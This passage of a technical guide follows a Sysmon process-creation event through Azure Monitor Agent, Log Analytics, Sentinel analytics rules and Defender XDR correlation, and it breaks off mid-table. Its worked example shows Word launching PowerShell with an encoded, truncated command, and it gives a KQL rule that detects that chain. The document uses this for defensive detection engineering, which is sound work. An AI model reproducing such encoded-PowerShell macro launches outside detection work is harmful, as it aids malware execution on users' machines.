&lt;p&gt;The Sysmon driver -- &lt;code&gt;SysmonDrv.sys&lt;/code&gt; -- is registered as a Windows &lt;strong&gt;boot-start driver&lt;/strong&gt; under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services\SysmonDrv&lt;/code&gt; with &lt;code&gt;Start=0&lt;/code&gt;, which means the I/O manager loads it during the early-boot phase before the bulk of user-mode services start; it also registers as an event-tracing-for-Windows (ETW) provider. On every process creation, it hooks the kernel&apos;s &lt;code&gt;PsSetCreateProcessNotifyRoutineEx&lt;/code&gt; callback, builds an event record, and writes it to the Windows event log channel &lt;code&gt;Microsoft-Windows-Sysmon/Operational&lt;/code&gt; [@ms-learn-sysmon] [@ms-learn-defrag-tools-sysmon]. The record carries roughly thirty fields, including the parent and child image paths, the command lines, the user SID, the integrity level, the hashes (configurable: MD5, SHA1, SHA256, IMPHASH), the parent and child &lt;code&gt;ProcessGuid&lt;/code&gt; values, and the kernel-side timestamp.&lt;/p&gt;
&lt;p&gt;A common slip: Sysmon&apos;s driver is &lt;em&gt;not&lt;/em&gt; an Early Launch Anti-Malware (ELAM) driver. ELAM is a separate, stricter Windows category for anti-malware vendors whose drivers must be certified by Microsoft and registered under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\EarlyLaunch&lt;/code&gt;. Sysmon ships as an ordinary boot-start driver (&lt;code&gt;Start=0&lt;/code&gt; under its &lt;code&gt;Services\SysmonDrv&lt;/code&gt; key); it loads early enough to observe most user-mode activity from the start, but it does not occupy the ELAM slot. A reader who internalizes the wrong classification will go looking for a &lt;code&gt;SysmonDrv&lt;/code&gt; entry under &lt;code&gt;EarlyLaunch&lt;/code&gt; and not find one [@ms-learn-sysmon].&lt;/p&gt;

A 128-bit identifier Sysmon assigns to every new process. Unlike the OS-assigned PID, which the kernel can recycle as processes exit, ProcessGuid is unique across the host&apos;s lifetime and lets downstream tooling reassemble a process tree even after PIDs have been reused. The Microsoft Sysmon page documents the property -- &quot;a unique value for this process across a domain to make event correlation easier&quot; -- but does not document how the GUID is constructed; downstream KQL queries and Defender XDR&apos;s advanced hunting schema rely only on its uniqueness, not on its internal composition [@ms-learn-sysmon].
&lt;p&gt;There is a subtle field nuance worth knowing. Sysmon also emits &lt;code&gt;LogonGuid&lt;/code&gt;, &lt;code&gt;LogonId&lt;/code&gt;, and &lt;code&gt;User&lt;/code&gt; on a ProcessCreate event. These three are &lt;em&gt;post-impersonation&lt;/em&gt; values -- they reflect the security context the new process was created under, which can differ from the token of the parent. For service-impersonation chains (a service spawning a child under a different account), ignoring this distinction will mislead an analyst on who &quot;owned&quot; the process. KQL detection queries should &lt;code&gt;project&lt;/code&gt; both parent and child user/SID and reconcile them explicitly.&lt;/p&gt;
&lt;p&gt;For the worked example, the kernel emission at 14:03:17 UTC contains, among other fields:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;EventID:       1
TimeCreated:   2026-06-02T14:03:17.412Z
Computer:      MAL-CONTOSO-PRD-04
ProcessGuid:   {62b9c5cf-7c64-67ab-2e00-000000003200}
ProcessId:     8124
Image:         C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine:   powershell.exe -EncodedCommand JABwAD0AJwBoAHQAdABwADoALwAv...
ParentProcessGuid:   {62b9c5cf-7b21-67ab-2c00-000000003200}
ParentProcessId:     6210
ParentImage:   C:\Program Files\Microsoft Office\root\Office16\winword.exe
ParentCommandLine:   &quot;winword.exe&quot; /n &quot;C:\Users\jdoe\Downloads\invoice.docm&quot;
User:          CONTOSO\jdoe
IntegrityLevel: Medium
Hashes:        SHA256=04ED...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Nothing further happens at hop 1 until someone reads the channel. The kernel will not push the event off the host; it will only sit in the local event log, rotating by size or age, until an agent picks it up. That is hop 2.&lt;/p&gt;
&lt;h3&gt;6.2 Hop 2 -- Azure Monitor Agent shipping via a Data Collection Rule&lt;/h3&gt;
&lt;p&gt;The agent that reads the Sysmon channel and ships it to the workspace is the &lt;strong&gt;Azure Monitor Agent (AMA)&lt;/strong&gt;. AMA replaced the older &lt;strong&gt;Microsoft Monitoring Agent (MMA)&lt;/strong&gt; / &lt;strong&gt;Log Analytics agent&lt;/strong&gt;, which Microsoft retired effective &lt;strong&gt;August 31, 2024&lt;/strong&gt; [@ms-learn-laa-deprecated]. Customers still running MMA past that date are in unsupported territory, and -- this is the critical operational fact -- AMA does &lt;strong&gt;not&lt;/strong&gt; automatically pick up where MMA left off. AMA requires explicit migration: a Data Collection Rule (DCR) describing which events to collect and which workspace to send them to [@ms-learn-ama-migration].&lt;/p&gt;

A modern Microsoft agent that runs on Windows and Linux servers (Azure VM, Arc-enabled, or on-prem) and ships event logs, performance counters, syslog, and custom text files to one or more Log Analytics workspaces, driven entirely by Data Collection Rule (DCR) configurations [@ms-learn-ama-overview].

An ARM-managed configuration object that names a data source type (e.g., `windowsEventLogs`), an XPath-based subscription (which channels and which event IDs), and one or more destinations (typically a `logAnalyticsWorkspace` + `streams` mapping such as `Microsoft-Event` for the generic `Event` table or `Microsoft-WindowsEvent` for the more recent typed Windows event ingestion path). DCRs are assigned to one or more agents via a Data Collection Rule Association (DCRA) [@ms-learn-dcr-overview] [@ms-learn-ama-windows-events].

flowchart LR
  CH[&quot;Windows event channels (XPath subscription)&quot;]
  AMA[&quot;Azure Monitor Agent process&quot;]
  DCR[&quot;Data Collection Rule (cached locally)&quot;]
  ING[&quot;Log Analytics ingestion endpoint -- regional HTTPS&quot;]
  TBL[&quot;Workspace table -- Event / SecurityEvent / WindowsEvent&quot;]
  CH --&amp;gt; AMA
  DCR --&amp;gt; AMA
  AMA --&amp;gt; ING
  ING --&amp;gt; TBL
  classDef cfg fill:#fff5d6,stroke:#b7791f,color:#5f370e
  classDef agent fill:#e8f4ff,stroke:#2b6cb0,color:#1a365d
  classDef sink fill:#e6fffa,stroke:#319795,color:#234e52
  class DCR cfg
  class AMA,CH agent
  class ING,TBL sink
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;strong&gt;The MMA-to-AMA silent-miss trap.&lt;/strong&gt; A workspace that is still in transition between MMA and AMA can have agents on the same host both running, both shipping the same &lt;code&gt;Event&lt;/code&gt; row, and producing double counts. Worse, a host that has had MMA uninstalled but a DCR mis-assigned will stop shipping entirely -- and because Sysmon writes to the local event log no matter what, no alert fires on the host itself. The first signal of the gap is silence in the &lt;code&gt;Event&lt;/code&gt; table for that &lt;code&gt;Computer&lt;/code&gt; value, which a Sentinel &quot;stale data source&quot; watchdog rule must explicitly detect. Microsoft retired MMA effective August 31, 2024 [@ms-learn-laa-deprecated].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;For the Sysmon channel specifically, AMA needs a DCR whose &lt;code&gt;windowsEventLogs&lt;/code&gt; block names the XPath subscription &lt;code&gt;Microsoft-Windows-Sysmon/Operational!*[System[(EventID=1)]]&lt;/code&gt; (or a broader filter that includes EventIDs 1, 3, 7, 8, 10, 11). The stream name in the destination block determines which table the record lands in: a DCR that names &lt;code&gt;Microsoft-Event&lt;/code&gt; ships into the generic &lt;code&gt;Event&lt;/code&gt; table; one that names &lt;code&gt;Microsoft-WindowsEvent&lt;/code&gt; ships into the newer &lt;code&gt;WindowsEvent&lt;/code&gt; table; and naming anything else silently emits nothing [@ms-learn-ama-windows-events] [@ms-learn-sentinel-data-connectors-ref]. The AMA does not log a hard error in this case; the events simply never appear, and the analyst sees a dashboard that is missing the wave.&lt;/p&gt;
&lt;p&gt;Hop 2 finishes at about 14:03:19 UTC for the worked example -- two seconds after the kernel emission. The record is now in the workspace&apos;s ingest buffer.&lt;/p&gt;
&lt;h3&gt;6.3 Hop 3 -- Workspace ingestion and the table-choice question&lt;/h3&gt;
&lt;p&gt;The ingestion endpoint validates the record against the named stream&apos;s schema, applies any DCR-side transformations, and persists the row into the destination table. From here on the record is queryable via KQL with end-to-end ingestion latency typically in the low minutes [@ms-learn-event-table]. For the Sysmon channel the destination table is almost always &lt;code&gt;Event&lt;/code&gt;, because the &lt;code&gt;SecurityEvent&lt;/code&gt; table is the Windows &lt;em&gt;Security&lt;/em&gt; channel only (the AMA &lt;code&gt;securityEvents&lt;/code&gt; data source), and the Sysmon channel is a separate operational channel [@ms-learn-securityevent-table].&lt;/p&gt;
&lt;p&gt;The table choice matters because it changes the shape of the row and the cost of querying it. The two relevant tables for Windows event data behave as follows:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;&lt;code&gt;Event&lt;/code&gt; (Microsoft-Event stream)&lt;/th&gt;
&lt;th&gt;&lt;code&gt;WindowsEvent&lt;/code&gt; (Microsoft-WindowsEvent stream)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Source&lt;/td&gt;
&lt;td&gt;AMA &lt;code&gt;windowsEventLogs&lt;/code&gt; data source [@ms-learn-ama-windows-events]&lt;/td&gt;
&lt;td&gt;AMA &lt;code&gt;windowsEventLogs&lt;/code&gt; data source (newer typed path) [@ms-learn-ama-windows-events]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;EventData shape&lt;/td&gt;
&lt;td&gt;XML in &lt;code&gt;EventData&lt;/code&gt; column (string)&lt;/td&gt;
&lt;td&gt;Pre-parsed JSON in &lt;code&gt;EventData&lt;/code&gt; (dynamic)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cost characteristic&lt;/td&gt;
&lt;td&gt;Standard ingest pricing [@ms-learn-sentinel-billing]&lt;/td&gt;
&lt;td&gt;Standard ingest pricing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Best for&lt;/td&gt;
&lt;td&gt;Mixed sources, simple filters&lt;/td&gt;
&lt;td&gt;Channels with deep parsing needs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;KQL parse pattern&lt;/td&gt;
&lt;td&gt;&lt;code&gt;parse_xml(EventData)&lt;/code&gt; per row&lt;/td&gt;
&lt;td&gt;Direct property access&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;In production, most Sysmon-on-Windows pipelines run on the older &lt;code&gt;Event&lt;/code&gt; table with a &lt;code&gt;parse_xml(EventData)&lt;/code&gt; shim. The parse is not cheap -- it allocates per row -- but it is the most common pattern because the older table predates the typed &lt;code&gt;WindowsEvent&lt;/code&gt; path and customer queries already exist against it. New deployments should consider the newer table if their detection logic touches many fields per row [@ms-learn-ama-windows-events].&lt;/p&gt;
&lt;p&gt;A representative KQL detection that runs against the older &lt;code&gt;Event&lt;/code&gt; table for the worked example looks like the snippet below. Show it to a SOC analyst and they will read it left-to-right; show it to a Kusto engineer and they will tell you the &lt;code&gt;parse_xml&lt;/code&gt; is the expensive part.&lt;/p&gt;
&lt;p&gt;The KQL that parses a Sysmon event out of the older &lt;code&gt;Event&lt;/code&gt; table follows a four-step idiom that is worth walking explicitly, because the same shape appears in every detection a SOC writes against XML-shaped Windows event data. &lt;strong&gt;Step one:&lt;/strong&gt; &lt;code&gt;parse_xml(EventData)&lt;/code&gt; reads the entire EventData payload (a string column) and returns a dynamic JSON tree whose root is &lt;code&gt;DataItem.EventData&lt;/code&gt; and whose interesting children are an array of &lt;code&gt;&amp;lt;Data Name=&quot;...&quot;&amp;gt;value&amp;lt;/Data&amp;gt;&lt;/code&gt; elements [@ms-learn-kusto-parse-xml]. &lt;strong&gt;Step two:&lt;/strong&gt; &lt;code&gt;mv-expand ev = ...DataItem.EventData.Data&lt;/code&gt; flattens that array so each &lt;code&gt;&amp;lt;Data&amp;gt;&lt;/code&gt; child becomes its own row -- a long-form representation where one event becomes thirty rows, one per field. &lt;strong&gt;Step three:&lt;/strong&gt; &lt;code&gt;extend Field = tostring(ev[&quot;@Name&quot;]), Value = tostring(ev[&quot;#text&quot;])&lt;/code&gt; projects the XML attribute and text payload into two typed columns named &lt;code&gt;Field&lt;/code&gt; and &lt;code&gt;Value&lt;/code&gt;. &lt;strong&gt;Step four:&lt;/strong&gt; &lt;code&gt;evaluate pivot(Field, take_any(Value), TimeGenerated, Computer)&lt;/code&gt; invokes the Kusto &lt;code&gt;pivot&lt;/code&gt; plugin, which rotates the long-form (Field, Value) rows back into a wide row with one column per field name -- so after the pivot, &lt;code&gt;CommandLine&lt;/code&gt;, &lt;code&gt;Image&lt;/code&gt;, &lt;code&gt;ParentImage&lt;/code&gt;, and &lt;code&gt;ProcessGuid&lt;/code&gt; become first-class columns the detection can filter on as if they had been typed all along [@ms-learn-kusto-pivot-plugin]. The same chain adapts to any other EventID (3 / NetworkConnect, 11 / FileCreate, etc.) and, with one less hop, to the typed &lt;code&gt;WindowsEvent&lt;/code&gt; table where &lt;code&gt;EventData&lt;/code&gt; is already pre-parsed JSON.&lt;/p&gt;
&lt;p&gt;Quick reference, in margin form: &lt;code&gt;parse_xml(EventData)&lt;/code&gt; -&amp;gt; dynamic JSON tree; &lt;code&gt;mv-expand ev = ...EventData.Data&lt;/code&gt; -&amp;gt; one row per &lt;code&gt;&amp;lt;Data&amp;gt;&lt;/code&gt; element; &lt;code&gt;extend Field/Value&lt;/code&gt; -&amp;gt; typed Field/Value columns; &lt;code&gt;evaluate pivot(Field, take_any(Value), ...)&lt;/code&gt; -&amp;gt; wide row, one column per field. The pivot step is what turns &quot;thirty long-form rows&quot; into &quot;one wide row with named columns&quot;; without it the detection has to filter on the Field/Value pairs directly, which is much harder to write and to read [@ms-learn-kusto-pivot-plugin].&lt;/p&gt;

```kql
Event
| where TimeGenerated &amp;gt; ago(5m)
| where Source == &quot;Microsoft-Windows-Sysmon&quot; and EventID == 1
| extend ev = parse_xml(EventData).DataItem.EventData.Data
| mv-expand ev
| extend Field = tostring(ev[&quot;@Name&quot;]), Value = tostring(ev[&quot;#text&quot;])
| evaluate pivot(Field, take_any(Value), TimeGenerated, Computer)
| where ParentImage endswith &quot;winword.exe&quot;
  and Image endswith &quot;powershell.exe&quot;
  and CommandLine contains &quot;-EncodedCommand&quot;
| project
    TimeGenerated, Computer, User,
    ParentImage, ParentProcessGuid,
    Image, ProcessGuid, CommandLine, Hashes
| extend
    HostCustomEntity = Computer,
    AccountCustomEntity = User,
    ProcessCustomEntity = ProcessGuid
```
&lt;p&gt;The five lines after the &lt;code&gt;pivot&lt;/code&gt; are the actual detection: an Office process spawning PowerShell with &lt;code&gt;-EncodedCommand&lt;/code&gt;. The three &lt;code&gt;*CustomEntity&lt;/code&gt; columns at the bottom are what wire this alert into the Defender XDR correlation engine at hop 6 -- they become typed entities on the resulting &lt;code&gt;SecurityAlert&lt;/code&gt; row [@ms-learn-sentinel-entities].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;strong&gt;Why the row of CustomEntity columns matters.&lt;/strong&gt; A Sentinel analytics rule that produces a &lt;code&gt;SecurityAlert&lt;/code&gt; without entity mappings will still alert -- and will still be readable by an analyst -- but it will &lt;em&gt;not&lt;/em&gt; participate in cross-pipeline correlation at hop 6. The XDR fan-in matches on entity values, and an alert with no entities has nothing to match on. This is a common oversight when migrating older queries into Sentinel from on-prem SIEMs that did not have an equivalent concept.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Hop 3 finishes at about 14:03:21 UTC: four seconds after kernel emission, with the row written to the workspace&apos;s &lt;code&gt;Event&lt;/code&gt; table and indexed for KQL query.&lt;/p&gt;
&lt;h3&gt;6.4 Hop 4 -- Sentinel analytics rule emits a SecurityAlert&lt;/h3&gt;
&lt;p&gt;Microsoft Sentinel supports several detection-rule shapes. The five that matter for understanding the Sysmon pipeline are summarized below, with the timing characteristics that drive end-to-end latency for hop 4.&lt;/p&gt;

A KQL query that Sentinel runs on a fixed schedule (default 5 minutes, minimum 5 minutes). When the query returns rows, each row -- subject to grouping configuration -- becomes a `SecurityAlert` row in the workspace and an alert object in Sentinel and in Defender XDR [@ms-learn-sentinel-scheduled-rules].

The Sentinel-rule configuration that names which output columns of the KQL detection map to which typed entities (Account, Host, Process, IP, URL, FileHash, etc.). Without entity mappings, an alert is &quot;orphan&quot; with respect to the Defender XDR correlation engine [@ms-learn-sentinel-entities].
&lt;p&gt;The five rule shapes and where they fire in the Sysmon path:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Rule type&lt;/th&gt;
&lt;th&gt;Query cadence&lt;/th&gt;
&lt;th&gt;Typical end-to-end latency&lt;/th&gt;
&lt;th&gt;Sysmon use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Scheduled analytics [@ms-learn-sentinel-scheduled-rules]&lt;/td&gt;
&lt;td&gt;Every 5+ min&lt;/td&gt;
&lt;td&gt;5-8 min from ingest&lt;/td&gt;
&lt;td&gt;The default for ProcessCreate detections&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Near-real-time (NRT) [@ms-learn-sentinel-nrt-rules]&lt;/td&gt;
&lt;td&gt;Every 1 min&lt;/td&gt;
&lt;td&gt;1-2 min from ingest&lt;/td&gt;
&lt;td&gt;High-priority single-event matches&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft security (parent-product)&lt;/td&gt;
&lt;td&gt;Tied to source product&lt;/td&gt;
&lt;td&gt;Sub-minute&lt;/td&gt;
&lt;td&gt;Pass-through for MDE / MDC / MDCA alerts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Fusion (multistage) [@ms-learn-sentinel-fusion]&lt;/td&gt;
&lt;td&gt;ML-driven, continuous&lt;/td&gt;
&lt;td&gt;Hours&lt;/td&gt;
&lt;td&gt;Cross-source attack-pattern detection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Threat-intelligence map [@ms-learn-sentinel-threat-detection]&lt;/td&gt;
&lt;td&gt;Continuous&lt;/td&gt;
&lt;td&gt;Sub-minute&lt;/td&gt;
&lt;td&gt;IOC matching on &lt;code&gt;Event&lt;/code&gt;-derived hashes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;For the worked example, the detection runs as a &lt;strong&gt;scheduled analytics rule&lt;/strong&gt; at five-minute cadence. The rule fires at 14:05:00 UTC, the query returns one row matching &lt;code&gt;winword.exe -&amp;gt; powershell.exe -EncodedCommand&lt;/code&gt;, and a &lt;code&gt;SecurityAlert&lt;/code&gt; is emitted at 14:05:04 UTC. The alert carries the &lt;code&gt;HostCustomEntity&lt;/code&gt;, &lt;code&gt;AccountCustomEntity&lt;/code&gt;, and &lt;code&gt;ProcessCustomEntity&lt;/code&gt; mappings that the rule defined.&lt;/p&gt;

{`// Three alerts arriving from three pipelines, each with entities.
const sentinelAlert = {
  source: &apos;Sentinel&apos;,
  time: &apos;14:05:04Z&apos;,
  entities: { Host: &apos;MAL-CONTOSO-PRD-04&apos;,
              Process: &apos;{62b9c5cf-7c64-67ab-2e00-000000003200}&apos; }
};
const mdcAlert = {
  source: &apos;MDC for Servers (via MDE)&apos;,
  time: &apos;14:07:42Z&apos;,
  entities: { Host: &apos;MAL-CONTOSO-PRD-04&apos;,
              File: &apos;powershell.exe&apos; }
};
const mdeAlert = {
  source: &apos;MDE native&apos;,
  time: &apos;14:08:11Z&apos;,
  entities: { Host: &apos;MAL-CONTOSO-PRD-04&apos;,
              Process: &apos;{62b9c5cf-7c64-67ab-2e00-000000003200}&apos; }
};
function correlate(alerts, windowMin = 30) {
  const byHost = new Map();
  for (const a of alerts) {
    const k = a.entities.Host;
    if (!byHost.has(k)) byHost.set(k, []);
    byHost.get(k).push(a);
  }
  return [...byHost.entries()].map(([host, alts]) =&amp;gt; ({
    incidentKey: &apos;host:&apos; + host,
    alerts: alts.map(a =&amp;gt; a.source)
  }));
}
console.log(correlate([sentinelAlert, mdcAlert, mdeAlert]));
// -&amp;gt; [{ incidentKey: &apos;host:MAL-CONTOSO-PRD-04&apos;,
//        alerts: [&apos;Sentinel&apos;,&apos;MDC for Servers (via MDE)&apos;,&apos;MDE native&apos;] }]
`}
&lt;p&gt;The toy correlator above only keys on &lt;code&gt;Host&lt;/code&gt;. The real one also keys on &lt;code&gt;Process&lt;/code&gt; (ProcessGuid where present), &lt;code&gt;Account&lt;/code&gt;, &lt;code&gt;IP&lt;/code&gt;, &lt;code&gt;URL&lt;/code&gt;, and &lt;code&gt;FileHash&lt;/code&gt;, and uses a sliding window plus a confidence-weighted merge that allows weak entities (file name) to participate when strong entities (ProcessGuid) overlap [@ms-learn-xdr-correlation]. The result is the same: three alerts in, one incident out.&lt;/p&gt;
&lt;p&gt;Two other Sentinel detection paths deserve a mention even though they did not fire for this specific worked example. &lt;strong&gt;UEBA anomalies&lt;/strong&gt; -- when enabled, Sentinel writes per-user and per-host baselines into &lt;code&gt;BehaviorAnalytics&lt;/code&gt; and &lt;code&gt;IdentityInfo&lt;/code&gt; tables; analytics rules can &lt;code&gt;join&lt;/code&gt; these to flag a normally-quiet jdoe spawning encoded PowerShell as anomalous independent of any specific signature [@ms-learn-sentinel-threat-detection]. &lt;strong&gt;Fusion&lt;/strong&gt; is an ML-driven multistage detector that operates over the broader alert + event corpus and emits Fusion-named incidents when it sees a chain that resembles an attack pattern (e.g., a phishing alert followed by a credential-access alert followed by a process-spawn anomaly within an hour on the same identity) [@ms-learn-sentinel-fusion]. Fusion&apos;s strength is correlation across products you would not have thought to correlate manually; its weakness is opacity, which §9 returns to.&lt;/p&gt;
&lt;p&gt;There is one further detection family worth introducing here because §10&apos;s recipe will explicitly avoid it: &lt;strong&gt;Defender XDR Custom Detections&lt;/strong&gt;. These are KQL queries authored not in Sentinel but in the unified portal&apos;s advanced hunting surface, and they emit alerts directly into Defender XDR rather than via the SIEM analytics-rule pipeline [@ms-learn-sentinel-custom-detections]. Custom detections can read &lt;code&gt;DeviceProcessEvents&lt;/code&gt; and the rest of the Defender advanced hunting schema, which is fed by the MDE sensor independent of Sysmon. For the worked example, a Custom Detection equivalent to the Sentinel scheduled rule would also have fired -- but it would have fired against MDE&apos;s &lt;code&gt;DeviceProcessEvents&lt;/code&gt; table, not against Log Analytics &lt;code&gt;Event&lt;/code&gt;. The two paths are not interchangeable. Microsoft&apos;s documentation is explicit that custom detections operate over the Defender XDR-internal advanced hunting schema, not over arbitrary Log Analytics tables [@ms-learn-sentinel-custom-detections] [@ms-learn-advanced-hunting].&lt;/p&gt;

Custom detection rules are rules you can design and tweak using advanced hunting queries. These rules let you proactively monitor various events and system states, including suspected breach activity and misconfigured endpoints. [@ms-learn-sentinel-custom-detections]
&lt;p&gt;That is the policy line that decides where to put a new rule: if your query reads from &lt;code&gt;DeviceProcessEvents&lt;/code&gt; (MDE feed), it belongs as an advanced-hunting custom detection inside Defender XDR; if your query reads from Sentinel &lt;code&gt;Event&lt;/code&gt; or &lt;code&gt;SecurityEvent&lt;/code&gt; (Log Analytics feed), it belongs as a Sentinel analytics rule. The recipe in §10 picks the Sentinel side because the worked example begins in Sysmon, not in MDE -- and Sysmon flows to Log Analytics, not to the MDE advanced-hunting schema.&lt;/p&gt;
&lt;h3&gt;6.5 Hop 5 -- Microsoft Defender for Cloud as the CWPP alert source&lt;/h3&gt;
&lt;p&gt;This hop is the most architecturally interesting and the most operationally misunderstood. It is also where the previous iteration of this article had to be corrected on its single most load-bearing detail, so the framing here is deliberate.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; &lt;strong&gt;Only Microsoft Defender for Cloud&apos;s CWPP alerts flow into Defender XDR -- not its CSPM posture findings.&lt;/strong&gt; A Secure Score recommendation that &quot;VMs should have endpoint protection installed&quot; or &quot;Storage accounts should restrict public access&quot; is a &lt;em&gt;posture finding&lt;/em&gt;. A &quot;Suspicious PowerShell command line detected on MAL-CONTOSO-PRD-04&quot; emitted by the Defender for Servers runtime plan is an &lt;em&gt;alert&lt;/em&gt;. Defender XDR ingests the alerts; the posture findings stay in the MDC blade [@ms-learn-mdc-xdr-concept] [@ms-learn-mdc-xdr-ingest].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The vocabulary first, because everything in this section depends on it.&lt;/p&gt;

Continuous assessment of cloud-resource configuration against a baseline of best practices (Microsoft cloud security benchmark, CIS, NIST 800-53, etc.). Output is *recommendations* and a *Secure Score*. CSPM does not see runtime telemetry. In Microsoft&apos;s stack, CSPM is the foundational layer of Microsoft Defender for Cloud and is free to enable [@ms-learn-mdc-introduction] [@ms-learn-secure-score].

Runtime detection on a deployed cloud workload -- a VM, a container, a SQL database, a storage account, an App Service. CWPP sees actual events (process spawns, network connections, control-plane API calls) and emits *alerts*. In MDC, CWPP is delivered as paid plans: Defender for Servers, Containers, SQL, Storage, App Service [@ms-learn-mdc-introduction] [@ms-learn-mdc-cwpp-features].

The default CSPM control framework that ships with Microsoft Defender for Cloud. MCSB is Microsoft&apos;s interpretation of CIS, NIST 800-53, and PCI DSS controls mapped to Azure, AWS, and GCP resource types. Recommendations are scored against MCSB by default; other frameworks can be added [@ms-learn-mcsb-overview].
&lt;p&gt;The CSPM-versus-CWPP distinction has direct operational consequences for what shows up at hop 6:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;What MDC emits&lt;/th&gt;
&lt;th&gt;Where it lives&lt;/th&gt;
&lt;th&gt;Flows to Defender XDR?&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Recommendation&lt;/strong&gt; (CSPM) -- e.g., &quot;Endpoint protection should be installed&quot;&lt;/td&gt;
&lt;td&gt;Recommendations blade in MDC + &lt;code&gt;SecurityRecommendation&lt;/code&gt; table&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;No&lt;/strong&gt; [@ms-learn-mdc-xdr-concept]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Secure Score&lt;/strong&gt; (CSPM) -- aggregate over recommendations&lt;/td&gt;
&lt;td&gt;Secure Score blade in MDC&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;No&lt;/strong&gt; [@ms-learn-secure-score]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Compliance assessment&lt;/strong&gt; (CSPM) -- per-framework rollup&lt;/td&gt;
&lt;td&gt;Regulatory compliance blade&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;No&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Alert&lt;/strong&gt; (CWPP) -- e.g., &quot;Suspicious PowerShell command line&quot;&lt;/td&gt;
&lt;td&gt;Alerts blade in MDC + &lt;code&gt;SecurityAlert&lt;/code&gt; table&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes&lt;/strong&gt; [@ms-learn-mdc-xdr-ingest]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Container runtime alert&lt;/strong&gt; -- e.g., &quot;Web shell detected in pod&quot;&lt;/td&gt;
&lt;td&gt;MDC Alerts + &lt;code&gt;SecurityAlert&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes&lt;/strong&gt; [@ms-learn-mdc-containers]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Storage runtime alert&lt;/strong&gt; -- e.g., &quot;Anomalous access from Tor IP&quot;&lt;/td&gt;
&lt;td&gt;MDC Alerts + &lt;code&gt;SecurityAlert&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes&lt;/strong&gt; [@ms-learn-mdc-storage]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The CWPP alerts come from MDC&apos;s five priced runtime plans. Each plan has its own data path, but they all converge on the same &lt;code&gt;SecurityAlert&lt;/code&gt; table in Log Analytics and on the same XDR ingestion path:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;MDC plan&lt;/th&gt;
&lt;th&gt;Workload&lt;/th&gt;
&lt;th&gt;Data source&lt;/th&gt;
&lt;th&gt;Reference&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Defender for Servers&lt;/td&gt;
&lt;td&gt;Windows / Linux VMs, Arc&lt;/td&gt;
&lt;td&gt;MDE sensor + agent telemetry&lt;/td&gt;
&lt;td&gt;[@ms-learn-mdc-defender-servers] [@ms-learn-mdc-mde-integration]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defender for Containers&lt;/td&gt;
&lt;td&gt;AKS, EKS, GKE pods&lt;/td&gt;
&lt;td&gt;runtime sensor + Kubernetes audit&lt;/td&gt;
&lt;td&gt;[@ms-learn-mdc-containers]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defender for SQL&lt;/td&gt;
&lt;td&gt;Azure SQL, Arc SQL&lt;/td&gt;
&lt;td&gt;Azure SQL Advanced Threat Protection signals&lt;/td&gt;
